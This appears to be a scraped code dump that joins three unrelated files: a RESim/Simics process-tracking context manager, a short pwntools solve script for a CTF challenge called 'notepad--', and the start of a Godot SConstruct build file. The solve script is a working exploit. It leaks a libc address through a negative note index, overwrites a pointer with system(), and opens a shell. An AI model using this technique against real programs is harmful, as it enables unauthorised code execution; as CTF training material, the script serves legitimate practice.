if bp.break_num == real_bp:
return bp.handle
return None
def showHaps(self):
self.lgr.debug('contextManager showHaps')
for hap in self.haps:
hap.show()
#def getRESimContext(self):
# return self.debugging_cell
def recordText(self, start, end):
self.lgr.debug('contextMgr recordText 0x%x 0x%x' % (start, end))
self.text_start = start
self.text_end = end
def getText(self):
return self.text_start, self.text_end
def nextHapHandle(self):
self.hap_handle = self.hap_handle+1
return self.hap_handle
def nextBreakHandle(self):
self.break_handle = self.break_handle+1
return self.break_handle
def genBreakpoint(self, cell, addr_type, mode, addr, length, flags, prefix=None):
''' create a GenContextManager breakpoint. This is not yet set.
Determine if the context should be resim, e.g., only when one of our
debugging processes is schedule.
'''
handle = self.nextBreakHandle()
if self.debugging_pid is not None and addr_type == Sim_Break_Linear:
cell = self.resim_context
#self.lgr.debug('gen break with resim context %s' % str(self.resim_context))
bp = GenBreakpoint(cell, addr_type, mode, addr, length, flags, handle, self.lgr, prefix=prefix)
self.breakpoints.append(bp)
#self.lgr.debug('genBreakpoint handle %d number of breakpoints is now %d prefix %s' % (handle, len(self.breakpoints), prefix))
return handle
def genDeleteBreakpoint(self, handle):
#self.lgr.debug('genDeleteBreakpoint handle %d -- do not delete, will be done in GenHap' % handle)
#for bp in self.breakpoints:
# if bp.handle == handle:
# bp.clear()
# self.breakpoints.remove(bp)
# return
#self.lgr.debug('genDeleteBreakpoint could not find break handle %d' % handle)
pass
def genDeleteHap(self, hap_handle, immediate=False):
if hap_handle is None:
self.lgr.warning('genDelteHap called with handle of none')
return
#self.lgr.debug('genDeleteHap hap_handle %d' % hap_handle)
hap_copy = list(self.haps)
for hap in hap_copy:
if hap.handle == hap_handle:
if immediate:
hap.clear(None)
else:
SIM_run_alone(hap.clear, None)
#self.lgr.debug('num breaks in hap %d is %d' % (hap_handle, len(hap.breakpoint_list)))
for bp in hap.breakpoint_list:
if bp in self.breakpoints:
#self.lgr.debug('removing bp %d from hap_handle %d break_num %s' % (bp.handle, hap_handle, str(bp.break_num)))
self.breakpoints.remove(bp)
else:
self.lgr.warning('genDeleteHap bp not in list, handle %d ' % (bp.handle))
#self.lgr.debug('genDeleteHap removing hap %d from list' % hap.handle)
self.haps.remove(hap)
return
#self.lgr.debug('genDeleteHap could not find hap_num %d' % hap_handle)
def genHapIndex(self, hap_type, callback, parameter, handle, name=None):
#self.lgr.debug('genHapIndex break_handle %d' % handle)
for bp in self.breakpoints:
if bp.handle == handle:
hap_handle = self.nextHapHandle()
hap = GenHap(hap_type, callback, parameter, hap_handle, self.lgr, [bp], name)
self.haps.append(hap)
return hap.handle
#self.lgr.error('genHapIndex failed to find break %d' % breakpoint)
def genHapRange(self, hap_type, callback, parameter, handle_start, handle_end, name=None):
#self.lgr.debug('genHapRange break_handle %d %d' % (handle_start, handle_end))
bp_start = None
bp_list = []
for bp in self.breakpoints:
if bp.handle >= handle_start:
bp_list.append(bp)
if bp.handle == handle_end:
hap_handle = self.nextHapHandle()
hap = GenHap(hap_type, callback, parameter, hap_handle, self.lgr, bp_list, name, immediate=False)
#self.lgr.debug('contextManager genHapRange set hap %s on %d breaks' % (name, len(bp_list)))
self.haps.append(hap)
return hap.handle
#self.lgr.error('genHapRange failed to find break for handles %d or %d' % (breakpoint_start, breakpoint_end))
def setAllBreak(self):
for bp in self.breakpoints:
bp.set()
if self.pageFaultGen is not None:
self.pageFaultGen.recordPageFaults()
def setAllHap(self, only_maze_breaks=False):
for hap in self.haps:
if (not only_maze_breaks and hap.name != 'exitMaze') or (only_maze_breaks and hap.name == 'exitMaze'):
hap.set()
def clearAllBreak(self):
''' Called to clear breaks within the resim context '''
for bp in self.breakpoints:
#if bp.cell == self.resim_context:
bp.clear()
if self.pageFaultGen is not None:
self.pageFaultGen.stopPageFaults()
def clearAllHap(self, keep_maze_breaks=False):
#self.lgr.debug('clearAllHap start')
for hap in self.haps:
if not keep_maze_breaks or hap.name != 'exitMaze':
hap.clear()
#self.lgr.debug('clearAllHap finish')
def getThreadRecs(self):
return self.watch_rec_list.keys()
def getThreadPids(self):
retval = []
for rec in self.watch_rec_list:
pid = self.watch_rec_list[rec]
#self.lgr.debug('genContextManager getThreadPids append %d to returned thread pid list' % (pid))
retval.append(pid)
return retval
def addNoWatch(self):
''' only watch maze exits for the current task. NOTE: assumes those are set after call to this function'''
self.lgr.debug('contextManager cell %s addNoWatch' % self.cell_name)
if len(self.nowatch_list) == 0 and len(self.watch_rec_list) == 0:
''' had not been watching and tasks. start so we can not watch this one '''
self.setTaskHap()
self.watching_tasks=True
self.lgr.debug('contextManager addNoWatch began watching tasks')
rec = self.task_utils.getCurTaskRec()
self.nowatch_list.append(rec)
self.lgr.debug('contextManager addNoWatch for rec 0x%x' % rec)
SIM_run_alone(self.clearAllHap, True)
def rmNoWatch(self):
''' restart watching the current task, assumes it was added via addNoWatch '''
rec = self.task_utils.getCurTaskRec()
if rec in self.nowatch_list:
self.nowatch_list.remove(rec)
self.lgr.debug('contextManager rmNoWatch, rec 0x%x removed from nowatch list' % rec)
if len(self.nowatch_list) == 0 and len(self.watch_rec_list) == 0:
''' stop all task watching '''
self.stopWatchTasks()
SIM_run_alone(self.setAllHap, False)
self.lgr.debug('contextManager addNoWatch stopped watching tasks, enabled all HAPs')
else:
''' restart watching '''
SIM_run_alone(self.setAllHap, False)
else:
self.lgr.error('contextManager rmNoWatch, rec 0x%x not in nowatch list' % rec)
def changedThread(self, cpu, third, forth, memory):
''' guts of context managment. set or remove breakpoints/haps
depending on whether we are tracking the newly scheduled process '''
if self.task_hap is None:
return
# get the value that will be written into the current thread address
new_addr = SIM_get_mem_op_value_le(memory)
prev_task = self.task_utils.getCurTaskRec()
#DEBUG BLOCK
pid = self.mem_utils.readWord32(cpu, new_addr + self.param.ts_pid)
comm = self.mem_utils.readString(cpu, new_addr + self.param.ts_comm, 16)
prev_pid = self.mem_utils.readWord32(cpu, prev_task + self.param.ts_pid)
prev_comm = self.mem_utils.readString(cpu, prev_task + self.param.ts_comm, 16)
self.lgr.debug('changeThread from %d (%s) to %d (%s) new_addr 0x%x watchlist len is %d debugging_comm is %s context %s' % (prev_pid,
prev_comm, pid, comm, new_addr, len(self.watch_rec_list), self.debugging_comm, cpu.current_context))
if len(self.pending_watch_pids) > 0:
''' Are we waiting to watch pids that have not yet been scheduled?
We don't have the process rec until it is ready to schedule. '''
if pid in self.pending_watch_pids:
self.lgr.debug('changedThread, pending add pid %d to watched processes' % pid)
self.watch_rec_list[new_addr] = pid
self.pending_watch_pids.remove(pid)
self.watchExit(rec=new_addr, pid=pid)
if pid not in self.pid_cache and comm == self.debugging_comm:
group_leader = self.mem_utils.readPtr(cpu, new_addr + self.param.ts_group_leader)
leader_pid = self.mem_utils.readWord32(cpu, group_leader + self.param.ts_pid)
add_it = False
if leader_pid in self.pid_cache:
add_it = True
elif pid == leader_pid:
parent = self.mem_utils.readPtr(cpu, new_addr + self.param.ts_real_parent)
if parent in self.watch_rec_list:
parent_pid = self.mem_utils.readWord32(cpu, parent + self.param.ts_pid)
self.lgr.debug('contextManager new clone %d is its own leader, but parent %d is in cache. Call the parent the leader.' % (pid, parent_pid))
add_it = True
leader_pid = parent_pid
else:
self.lgr.debug('contextManager pid:%d (%s) not in cache, nor is parent in watch_rec_list 0x%x' % (pid, comm, parent))
if add_it:
''' TBD, we have no reason to believe this clone is created by the group leader? Using parent or real_parent is no help'''
self.lgr.debug('contextManager adding clone %d (%s) leader is %d' % (pid, comm, leader_pid))
self.addTask(pid, new_addr)
self.top.addProc(pid, leader_pid, comm, clone=True)
self.watchExit(new_addr, pid)
self.top.recordStackClone(pid, leader_pid)
else:
self.lgr.debug('contextManager pid:%d (%s) not in cache, group leader 0x%x leader pid %d' % (pid, comm, group_leader, leader_pid))
elif pid in self.pid_cache and new_addr not in self.watch_rec_list:
self.lgr.debug('*********** pid in cache, but new_addr not in watch list? eh?')
if not self.watching_tasks and \
(new_addr in self.watch_rec_list or (len(self.watch_rec_list) == 0 and len(self.nowatch_list) > 0)) \
and not (self.single_thread and pid != self.debugging_pid):
''' Not currently watching processes, but new process should be watched '''
if self.debugging_pid is not None:
cpu.current_context = self.resim_context
#self.lgr.debug('resim_context')
#self.lgr.debug('Now scheduled %d new_addr 0x%x' % (pid, new_addr))
self.watching_tasks = True
self.setAllBreak()
only_maze_breaks = False
if new_addr in self.nowatch_list:
only_maze_breaks = True
#self.lgr.debug('contextManager changedThread, only do maze breaks')
SIM_run_alone(self.setAllHap, only_maze_breaks)
elif self.watching_tasks:
if prev_task in self.nowatch_list:
if new_addr not in self.nowatch_list:
''' was watching only maze exits, watch everything but maze'''
#self.lgr.debug('was watching only maze, now watch all ')
SIM_run_alone(self.clearAllHap, False)
SIM_run_alone(self.setAllHap, False)
elif new_addr in self.nowatch_list:
''' was watching everything, watch only maze '''
#self.lgr.debug('Now only watch maze')
SIM_run_alone(self.clearAllHap, False)
SIM_run_alone(self.setAllHap, True)
elif len(self.watch_rec_list) > 0 and new_addr not in self.watch_rec_list:
''' Watching processes, but new process should not be watched '''
if self.debugging_pid is not None:
cpu.current_context = self.default_context
#self.lgr.debug('default_context')
#self.lgr.debug('No longer scheduled')
self.watching_tasks = False
#self.auditExitBreaks()
self.clearAllBreak()
#if pid not in self.task_switch:
# self.task_switch[pid] = []
#self.task_switch[pid].append(self.cpu.cycles)
SIM_run_alone(self.clearAllHap, False)
elif len(self.watch_rec_list) > 0:
''' switching between watched pids '''
#if pid not in self.task_switch:
# self.task_switch[pid] = []
#self.task_switch[pid].append(self.cpu.cycles)
pass
if self.catch_pid == pid:
self.lgr.debug('contextManager changedThread do catch_callback for pid %d' % pid)
SIM_break_simulation('in pid %d' % pid)
#SIM_run_alone(self.catch_callback, None)
self.catch_pid = None
def catchPid(self, pid, callback):
self.catch_pid = pid
self.catch_callback = callback
def watchAll(self):
self.watch_only_this = False
def watchOnlyThis(self):
ctask = self.task_utils.getCurTaskRec()
cur_pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid)
pcopy = list(self.pid_cache)
for pid in pcopy:
if pid != cur_pid:
self.rmTask(pid)
self.watch_only_this = True
def rmTask(self, pid, killed=False):
''' remove a pid from the list of task records being watched. return True if this is the last thread. '''
retval = False
rec = self.task_utils.getRecAddrForPid(pid)
if rec is None and killed:
''' assume record already gone '''
for r in self.watch_rec_list:
if self.watch_rec_list[r] == pid:
rec = r
self.lgr.debug('contextManager rmTask %d rec already gone, remove its entries' % pid)
break
if rec in self.watch_rec_list:
del self.watch_rec_list[rec]
self.lgr.debug('rmTask removing rec 0x%x for pid %d, len now %d' % (rec, pid, len(self.watch_rec_list)))
if pid in self.pid_cache:
self.pid_cache.remove(pid)
self.lgr.debug('rmTask remove %d from cache, cache now %s' % (pid, str(self.pid_cache)))
if pid in self.task_rec_bp and self.task_rec_bp[pid] is not None:
SIM_delete_breakpoint(self.task_rec_bp[pid])
self.lgr.debug('contextManger rmTask pid %d' % pid)
SIM_hap_delete_callback_id('Core_Breakpoint_Memop', self.task_rec_hap[pid])
del self.task_rec_bp[pid]
del self.task_rec_hap[pid]
del self.task_rec_watch[pid]
if len(self.watch_rec_list) == 0:
if self.debugging_comm is None:
self.lgr.warning('contextManager rmTask debugging_comm is None')
else:
self.lgr.debug('contextManager rmTask watch_rec_list empty, clear debugging_pid')
#self.debugging_comm = None
#self.debugging_cell = None
pids = self.task_utils.getPidsForComm(self.debugging_comm)
if len(pids) == 0:
self.cpu.current_context = self.default_context
self.stopWatchTasks()
retval = True
else:
if self.top.swapSOPid(pid, pids[0]):
self.lgr.debug('contextManager rmTask, still pids for comm %s, was fork? set dbg pid to %d' % (self.debugging_comm, pids[0]))
''' replace SOMap pid with new one from fork '''
self.debugging_pid = pids[0]
else:
''' TBD poor hueristic for deciding it was not a fork '''
self.cpu.current_context = self.default_context
self.stopWatchTasks()
retval = True
elif pid == self.debugging_pid:
self.debugging_pid = self.pid_cache[0]
self.lgr.debug('rmTask debugging_pid now %d' % self.debugging_pid)
else:
self.lgr.debug('rmTask remaining debug recs %s' % str(self.watch_rec_list))
return retval
def addTask(self, pid, rec=None):
if rec is None:
rec = self.task_utils.getRecAddrForPid(pid)
if rec not in self.watch_rec_list:
if rec is None:
#self.lgr.debug('genContextManager, addTask got rec of None for pid %d, pending' % pid)
self.pending_watch_pids.append(pid)
else:
#self.lgr.debug('genContextManager, addTask pid %d add rec 0x%x' % (pid, rec))
self.watch_rec_list[rec] = pid
self.watchExit(rec=rec, pid=pid)
if pid not in self.pid_cache:
self.pid_cache.append(pid)
else:
#self.lgr.debug('addTask, already has rec 0x%x for PID %d' % (rec, pid))
pass
def watchingThis(self):
ctask = self.task_utils.getCurTaskRec()
dumb, comm, cur_pid = self.task_utils.curProc()
if cur_pid in self.pid_cache or ctask in self.watch_rec_list:
#self.lgr.debug('am watching pid:%d' % cur_pid)
return True
else:
#self.lgr.debug('not watching %d' % cur_pid)
return False
def amWatching(self, pid):
ctask = self.task_utils.getCurTaskRec()
dumb, comm, cur_pid = self.task_utils.curProc()
if pid == cur_pid and (ctask in self.watch_rec_list or len(self.watch_rec_list)==0):
return True
elif pid in self.pid_cache:
return True
else:
return False
def restoreDefaultContext(self):
self.cpu.current_context = self.default_context
self.lgr.debug('contextManager restoreDefaultContext')
def restoreDebugContext(self):
self.cpu.current_context = self.resim_context
self.lgr.debug('contextManager restoreDebugContext')
def restoreDebug(self):
self.debugging_pid = self.debugging_pid_saved
self.watch_rec_list = self.watch_rec_list_saved.copy()
for ctask in self.watch_rec_list:
self.pid_cache.append(self.watch_rec_list[ctask])
self.cpu.current_context = self.resim_context
self.lgr.debug('contextManager restoreDebug set cpu context to resim, debugging_pid to %s' % str(self.debugging_pid))
def stopWatchTasks(self):
if self.task_break is None:
self.lgr.debug('stopWatchTasks already stopped')
return
SIM_delete_breakpoint(self.task_break)
SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_hap)
self.task_hap = None
self.task_break = None
self.watching_tasks = False
self.watch_rec_list_saved = self.watch_rec_list.copy()
if self.debugging_pid is not None:
self.debugging_pid_saved = self.debugging_pid
self.watch_rec_list = {}
for pid in self.task_rec_bp:
if self.task_rec_bp[pid] is not None:
self.lgr.debug('stopWatchTasks delete bp %d' % self.task_rec_bp[pid])
SIM_delete_breakpoint(self.task_rec_bp[pid])
SIM_hap_delete_callback_id('Core_Breakpoint_Memop', self.task_rec_hap[pid])
self.task_rec_bp = {}
self.task_rec_hap = {}
self.task_rec_watch = {}
self.pid_cache = []
self.debugging_pid = None
cpu, dumb, dumb2 = self.task_utils.curProc()
cpu.current_context = self.default_context
self.lgr.debug('stopWatchTasks reverted %s to default context %s' % (cpu.name, str(self.default_context)))
def resetWatchTasks(self):
''' Intended for use when going back in time '''
self.lgr.debug('resetWatchTasks')
self.stopWatchTasks()
self.watchTasks(set_debug_pid = True)
if not self.watch_only_this:
ctask = self.task_utils.getCurTaskRec()
pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid)
if pid == 1:
self.lgr.debug('resetWatchTasks got leader pid of 1, skip')
return
leader_pid = self.task_utils.getGroupLeaderPid(pid)
pid_list = self.task_utils.getGroupPids(leader_pid)
for pid in pid_list:
if pid == 1:
self.lgr.debug('resetWatchTasks got pid of 1, skip')
else:
self.addTask(pid)
def setTaskHap(self):
#print('genContextManager setTaskHap debugging_cell is %s' % self.debugging_cell)
self.task_break = SIM_breakpoint(self.cpu.physical_memory, Sim_Break_Physical, Sim_Access_Write,
self.phys_current_task, self.mem_utils.WORD_SIZE, 0)
#self.lgr.debug('genContextManager setTaskHap bp %d' % self.task_break)
self.task_hap = SIM_hap_add_callback_index("Core_Breakpoint_Memop", self.changedThread, self.cpu, self.task_break)
#self.lgr.debug('setTaskHap cell %s break %d set on physical 0x%x' % (self.cell_name, self.task_break, self.phys_current_task))
def restoreWatchTasks(self):
self.watching_tasks = True
if self.debugging_pid is not None:
self.lgr.debug('contextManager restoreWatchTasks cpu context to resim')
self.cpu.current_context = self.resim_context
def watchTasks(self, set_debug_pid = False):
if self.task_break is not None:
#self.lgr.debug('watchTasks called, but already watching')
return
ctask = self.task_utils.getCurTaskRec()
pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid)
if pid == 1:
#self.lgr.debug('contextManager watchTasks, pid is 1, ignore')
return
if self.task_break is None:
self.setTaskHap()
self.watching_tasks = True
self.watchExit()
self.pageFaultGen.recordPageFaults()
if ctask in self.watch_rec_list:
self.lgr.debug('watchTasks, current task already being watched')
return
self.lgr.debug('watchTasks cell %s watch record 0x%x pid: %d set_debug_pid: %r' % (self.cell_name, ctask, pid, set_debug_pid))
self.watch_rec_list[ctask] = pid
if pid not in self.pid_cache:
self.pid_cache.append(pid)
group_leader = self.task_utils.getGroupLeaderPid(pid)
if group_leader != self.group_leader:
#self.lgr.debug('contextManager watchTasks x set group leader to %d' % group_leader)
self.group_leader = group_leader
if set_debug_pid:
self.setDebugPid()
def changeDebugPid(self, pid):
if pid not in self.pid_cache:
self.lgr.error('contextManager changeDebugPid not in pid cache %d' % pid)
return
self.lgr.debug('changeDebugPid to %d' % pid)
self.debugging_pid = pid
def singleThread(self, single):
self.single_thread = single
def setDebugPid(self):
if self.debugging_pid is not None:
self.lgr.debug('contextManager setDebugPid already set to %d' % self.debugging_pid)
return
cell, comm, cur_pid = self.task_utils.curProc()
#self.default_context = self.cpu.current_context
self.cpu.current_context = self.resim_context
self.lgr.debug('setDebugPid %d, (%s) resim_context' % (cur_pid, comm))
self.debugging_pid = cur_pid
self.debugging_comm = comm
self.debugging_cell = self.top.getCell()
if cur_pid not in self.pid_cache:
self.pid_cache.append(cur_pid)
def killGroup(self, lead_pid, exit_syscall):
self.top.rmDebugExitHap()
if lead_pid == self.group_leader:
pids = self.task_utils.getPidsForComm(self.debugging_comm)
add_task = None
for p in pids:
if p not in self.pid_cache:
self.lgr.debug('killGroup found pid %d not in cache, was it a fork?' % p)
add_task =p
break
self.lgr.debug('contextManager killGroup %d is leader, pid_cache is %s' % (lead_pid, str(self.pid_cache)))
cache_copy = list(self.pid_cache)
for pid in cache_copy:
ida_msg = 'killed %d member of group led by %d' % (pid, lead_pid)
exit_syscall.handleExit(pid, ida_msg, killed=True, retain_so=True)
#self.rmTask(pid, killed=True)
#if pid in self.demise_cache:
# self.demise_cache.remove(pid)
if self.pageFaultGen is not None:
if self.pageFaultGen.handleExit(pid):
print('SEGV on pid %d?' % pid)
self.lgr.debug('genContextManager SEGV on pid %d?' % pid)
self.clearExitBreaks()
if add_task is not None:
self.addTask(add_task)
elif self.group_leader != None:
self.lgr.debug('contextManager killGroup NOT leader. got %d, leader was %d' % (lead_pid, self.group_leader))
if self.pageFaultGen is not None:
self.pageFaultGen.handleExit(lead_pid)
else:
self.lgr.debug('contextManager killGroup NO leader. got %d' % (lead_pid))
if self.pageFaultGen is not None:
self.pageFaultGen.handleExit(lead_pid)
def deadParrot(self, pid):
''' who knew? death comes betweeen the breakpoint and the "run alone" scheduling '''
exit_syscall = self.top.getSyscall(self.cell_name, 'exit_group')
if exit_syscall is not None and not self.watching_page_faults:
ida_msg = 'pid:%d exit via kill?' % pid
self.lgr.debug('contextManager deadParrot pid:%d rec no longer found call killGroup' % (pid))
self.killGroup(pid, exit_syscall)
#exit_syscall.handleExit(pid, ida_msg, killed=True)
else:
self.rmTask(pid)
if self.pageFaultGen is not None:
self.pageFaultGen.handleExit(pid)
self.clearExitBreaks()
self.lgr.debug('contextManager deadParrot pid:%d rec no longer found removed task' % (pid))
if self.exit_callback is not None:
self.exit_callback()
def resetAlone(self, pid):
self.lgr.debug('contextManager resetAlone')
dead_rec = self.task_utils.getRecAddrForPid(pid)
if dead_rec is not None:
list_addr = self.task_utils.getTaskListPtr(dead_rec)
if list_addr is not None:
self.lgr.debug('contextMgr resetAlone rec 0x%x of pid %d still found though written by maybe not dead after all? new list_addr is 0x%x' % (dead_rec,
pid, list_addr))
SIM_delete_breakpoint(self.task_rec_bp[pid])
del self.task_rec_bp[pid]
SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_rec_hap[pid])
del self.task_rec_hap[pid]
del self.task_rec_watch[pid]
self.watchExit(rec=dead_rec, pid = pid)
else:
self.lgr.debug('contextMgr resetAlone rec 0x%x of pid %d EXCEPT new list_addr is None call deadParrot' % (dead_rec, pid))
self.deadParrot(pid)
else:
self.lgr.debug('contextMgr resetAlone pid %d no record for pid, call deadParrot' % (pid))
self.deadParrot(pid)
if pid in self.demise_cache:
self.demise_cache.remove(pid)
def taskRecHap(self, pid, third, forth, memory):
self.lgr.debug('taskRecHap pid %d' % pid)
if pid not in self.task_rec_hap or pid in self.demise_cache:
return
dumb, comm, cur_pid = self.task_utils.curProc()
self.lgr.debug('contextManager taskRecHap demise of pid:%d by the hand of cur_pid %d?' % (pid, cur_pid))
dead_rec = self.task_utils.getRecAddrForPid(pid)
if dead_rec is not None:
if pid != cur_pid:
self.lgr.debug('contextManager taskRecHap got record 0x%x for %d, call resetAlone' % (dead_rec, pid))
self.demise_cache.append(pid)
SIM_run_alone(self.resetAlone, pid)
else:
self.lgr.debug('Pid %d messing with its own task rec? Let it go.' % pid)
else:
value = SIM_get_mem_op_value_le(memory)
self.lgr.debug('contextManager taskRecHap pid:%d wrote 0x%x to 0x%x watching for demise of %d' % (cur_pid, value, memory.logical_address, pid))
exit_syscall = self.top.getSyscall(self.cell_name, 'exit_group')
if exit_syscall is not None and not self.watching_page_faults:
ida_msg = 'pid:%d exit via kill?' % pid
self.killGroup(pid, exit_syscall)
#exit_syscall.handleExit(pid, ida_msg, killed=True)
else:
self.rmTask(pid)
if self.exit_callback is not None:
self.exit_callback()
def setExitCallback(self, callback):
self.exit_callback = callback
def watchGroupExits(self):
dumb, comm, cur_pid = self.task_utils.curProc()
leader_pid = self.task_utils.getGroupLeaderPid(cur_pid)
if leader_pid is None:
self.lgr.error('contextManager watchGroupExits no group leader for %d' % cur_pid)
self.lgr.debug('contextManager watchGroupExit cur_pid %d, leader %d' % (cur_pid, leader_pid))
pid_dict = self.task_utils.getGroupPids(leader_pid)
for pid in pid_dict:
self.watchExit(rec=pid_dict[pid], pid=pid)
def watchExit(self, rec=None, pid=None):
retval = True
''' set breakpoint on task record that points to this (or the given) pid '''
#self.lgr.debug('contextManager watchExit')
dumb, comm, cur_pid = self.task_utils.curProc()
if pid is None and cur_pid == 1:
self.lgr.debug('watchExit for pid 1, ignore')
return False
if pid is None:
pid = cur_pid
rec = self.task_utils.getCurTaskRec()
if rec is None:
self.lgr.error('contextManager watchExit failed to get list_addr pid %d cur_pid %d ' % (pid, cur_pid))
return False
list_addr = self.task_utils.getTaskListPtr(rec)
if list_addr is None:
''' suspect the thread is in the kernel, e.g., on a syscall, and has not yet been formally scheduled, and thus
has no place in the task list? OR all threads share the same next_ts pointer'''
#self.lgr.debug('contextManager watchExit failed to get list_addr pid %d cur_pid %d rec 0x%x' % (pid, cur_pid, rec))
return False
if pid not in self.task_rec_bp or self.task_rec_bp[pid] is None:
watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr)
if watch_pid in self.pid_cache:
#cell = self.resim_context
cell = self.default_context
else:
cell = self.default_context
#cell = self.resim_context
#self.lgr.debug('Watching next record of pid:%d (%s) for death of pid:%d' % (watch_pid, watch_comm, pid))
self.task_rec_bp[pid] = SIM_breakpoint(cell, Sim_Break_Linear, Sim_Access_Write, list_addr, self.mem_utils.WORD_SIZE, 0)
#bp = self.genBreakpoint(cell, Sim_Break_Linear, Sim_Access_Write, list_addr, self.mem_utils.WORD_SIZE, 0)
#self.lgr.debug('contextManager watchExit cur pid:%d set list break %d at 0x%x for pid %d context %s' % (cur_pid, self.task_rec_bp[pid],
# list_addr, pid, str(cell)))
#self.task_rec_hap[pid] = self.genHapIndex("Core_Breakpoint_Memop", self.taskRecHap, pid, bp)
#self.lgr.debug('contextManager watchExit pid %d bp: %d' % (pid, self.task_rec_bp[pid]))
self.task_rec_hap[pid] = SIM_hap_add_callback_index("Core_Breakpoint_Memop", self.taskRecHap, pid, self.task_rec_bp[pid])
self.task_rec_watch[pid] = list_addr
else:
#self.lgr.debug('contextManager watchExit, already watching for pid %d' % pid)
pass
return retval
def auditExitBreaks(self):
for pid in self.task_rec_watch:
rec = self.task_utils.getRecAddrForPid(pid)
if rec is None:
self.lgr.debug('contextManager auditExitBreaks failed to get task record for pid %d' % pid)
else:
list_addr = self.task_utils.getTaskListPtr(rec)
if list_addr is None:
''' suspect the thread is in the kernel, e.g., on a syscall, and has not yet been formally scheduled, and thus
has no place in the task list? '''
self.lgr.debug('contextManager auditExitBreaks failed to get list_addr pid %d rec 0x%x' % (pid, rec))
elif self.task_rec_watch[pid] is None:
watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr)
self.lgr.debug('contextManager auditExitBreaks rec_watch for %d is None, but taskUtils reports %d' % (pid, watch_pid))
elif list_addr != self.task_rec_watch[pid]:
watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr)
prev_pid, prev_comm = self.task_utils.getPidCommFromNext(self.task_rec_watch[pid])
self.lgr.debug('contextManager auditExitBreaks changed in record watch for death of %d, was watching %d, now %d' % (pid, watch_pid, prev_pid))
def setExitBreaks(self):
#self.lgr.debug('contextManager setExitBreaks')
for pid in self.task_rec_bp:
rec = self.task_utils.getRecAddrForPid(pid)
self.watchExit(rec, pid)
def clearExitBreaks(self):
self.lgr.debug('contextManager clearExitBreaks')
for pid in self.task_rec_bp:
if self.task_rec_bp[pid] is not None:
SIM_delete_breakpoint(self.task_rec_bp[pid])
self.task_rec_bp[pid] = None
#self.lgr.debug('contextManager clearExitBreaks pid:%d' % pid)
for pid in self.task_rec_hap:
if self.task_rec_hap[pid] is not None:
SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_rec_hap[pid])
self.task_rec_hap[pid] = None
def resetBackStop(self):
pass
def getIdaMessage(self):
return self.ida_message
def getDebugPid(self):
return self.debugging_pid, self.cpu
def showIdaMessage(self):
print 'genMonitor says: %s' % self.ida_message
self.lgr.debug('genMonitor says: %s' % self.ida_message)
def setIdaMessage(self, message):
#self.lgr.debug('ida message set to %s' % message)
self.ida_message = message
def getRESimContext(self):
return self.resim_context
def getDefaultContext(self):
return self.default_context
def watchPageFaults(self, watching):
self.watching_page_faults = watching
def callMe(self, pageFaultGen):
self.pageFaultGen = pageFaultGen
| [
"mfthomps@nps.edu"
] | mfthomps@nps.edu |
2e3157f0b093f2638437aa07b0c09b42299befbf | 5b6269ad53eb8c3f4eae21c3b4a0667527e75172 | /Challenges/Pwn/notepad--/solve.py | e0ba8f9166d9945089eb2a713fcf867b05ae7194 | [] | no_license | NUSGreyhats/welcome-ctf-2021 | 15c28dc7aaab91b0c939a08caaf907454213235a | eda2a0e5ffd6293aafbabab141499c9c973b4d5f | refs/heads/main | 2023-08-03T21:31:15.779090 | 2021-09-07T15:05:11 | 2021-09-07T15:05:11 | 376,068,403 | 21 | 6 | null | null | null | null | UTF-8 | Python | false | false | 876 | py | from pwn import *
if args.REMOTE:
p = remote('localhost', 5001)
else:
p = process("./dist/notepad.o", env={'LD_PRELOAD': './dist/libc.so.6'})
e = ELF("./dist/notepad.o")
libc = ELF("./dist/libc.so.6")
def view_note(idx):
p.sendlineafter(">", "2")
p.sendlineafter("Index: ", str(idx))
def create_note(idx, name, content):
p.sendlineafter(">", "1")
p.sendlineafter("Index: ", str(idx))
p.sendafter("Name: ", name)
p.sendafter("Content: ", content)
view_note(-4)
p.recvuntil('Name: ')
name = p.recvline(keepends=False)
printf = u64(name.ljust(8, b'\0'))
info(f"printf = {hex(printf)}")
libc.address = printf - libc.symbols['printf']
success(f"libc = {hex(libc.address)}")
system = libc.symbols['system']
create_note(-5, p64(0)*2, p64(0) + p64(0) + p64(system) + p64(0))
create_note(0, "/bin/sh", "<bleh>")
view_note(0)
p.interactive() | [
"enigmatrix2000@gmail.com"
] | enigmatrix2000@gmail.com |
8f20c2f26ceb51e392dd210bf3dd5f07b794c615 | 2ff207e57902ccd0f1df23800c8f6e4628c06230 | /SConstruct | 76a19d372952617846cf8149f67131a16125506f | [] | no_license | mdrgon1/Z-1.5 | af1d2f0b49434017522e26f6e518ce658935c5a9 | a7ce5df6beb2bf616144d030456125398f3abe7e | refs/heads/master | 2022-12-02T07:12:55.506397 | 2020-07-28T05:56:09 | 2020-07-28T05:56:09 | 246,069,381 | 0 | 0 | null | 2020-07-28T05:53:14 | 2020-03-09T15:15:36 | C++ | UTF-8 | Python | false | false | 3,719 | #!python
import os, subprocess
opts = Variables([], ARGUMENTS)
# Gets the standard flags CC, CCX, etc.
env = DefaultEnvironment()
# Define our options
opts.Add(EnumVariable('target', "Compilation target", 'debug', ['d', 'debug', 'r', 'release']))
opts.Add(EnumVariable('platform', "Compilation platform", '', ['', 'windows', 'x11', 'linux', 'osx']))
opts.Add(EnumVariable('p', "Compilation target, alias for 'platform'", '', ['', 'windows', 'x11', 'linux', 'osx']))
opts.Add(BoolVariable('use_llvm', "Use the LLVM / Clang compiler", 'no'))
opts.Add(PathVariable('target_path', 'The path where the lib is installed.', 'project/bin/'))
opts.Add(PathVariable('target_name', 'The library name.', 'libterrainGen', PathVariable.PathAccept))
# Local dependency paths, adapt them to your setup
godot_headers_path = "godot-cpp/godot_headers/"
cpp_bindings_path = "godot-cpp/"
cpp_library = "libgodot-cpp"
# only support 64 at this time..
bits = 64
# Updates the environment with the option variables.
opts.Update(env)
# Process some arguments
if env['use_llvm']:
env['CC'] = 'clang'
env['CXX'] = 'clang++'
if env['p'] != '':
env['platform'] = env['p']
if env['platform'] == '':
print("No valid target platform selected.")
quit();
# For the reference:
# - CCFLAGS are compilation flags shared between C and C++
